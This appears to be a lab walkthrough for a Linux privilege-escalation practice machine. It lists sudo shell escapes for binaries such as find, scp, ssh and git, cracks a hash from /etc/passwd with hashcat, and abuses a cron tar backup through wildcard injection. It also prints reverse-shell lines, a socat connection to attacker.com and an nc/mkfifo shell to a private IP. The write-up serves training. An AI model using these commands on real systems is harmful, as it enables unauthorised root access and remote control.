Exploitation
This machine does not need enumeration because the author already gave us a credentials and this machine is let us to practice our privilege escalation skills
After logged in using the credentials
Privilege Escalation
we then can type sudo -l
We can see a lot of user rights exploit
Method 1 ( User Rights)
We can go to this website and get the cheat sheet from it hehe. A lot is very easy so we are not gonna cover everything.
/bin/ash
/bin/ed
/usr/bin/env
/usr/bin/expect
Copy sudo expect -c 'spawn /bin/sh; interact'
/usr/bin/find
Copy sudo find . -exec /bin/sh \; -quit
/usr/bin/more
Copy TERM= sudo -E more /etc/profile
!/bin/sh
/usr/bin/scp
Copy TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
/usr/bin/socat
On our machine
Copy socat file:`tty`,raw,echo=0 tcp-listen:12345
On target machine
Copy sudo sh -c 'cp $(which socat) .; chmod +s ./socat'
RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
/usr/bin/ssh
Copy sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
/usr/bin/pico
Copy sudo pico
^R^X
reset; sh 1>&0 2>&0
/usr/bin/rvim
Copy sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
/usr/bin/tclsh
Copy sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
/usr/bin/git
Copy sudo git -p help config
!/bin/sh
Method 2 hash passwords
When we cat /etc/passwd, we can see all the users available in the system, then we can see a user has a hash
Put it at hashcat and we can decode the hash
Copy hashcat AzER3pBZh6WZE -m 1500 /usr/share/wordlists/rockyou.txt
We got the password and su
to user insecurity
, then we can get root
Method 3 cron jobs
If we type cat /etc/crontab
we can see that there is a backup running every 1 minute
If we la -la /etc/backups
We can see that tar file. If you read this article on this website , here we have a very details explanation
On our machine
On target machine
Copy echo "mkfifo /tmp/lhennp; nc 192.168.1.102 9999 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
After wait for 1 minute then we can get a shell.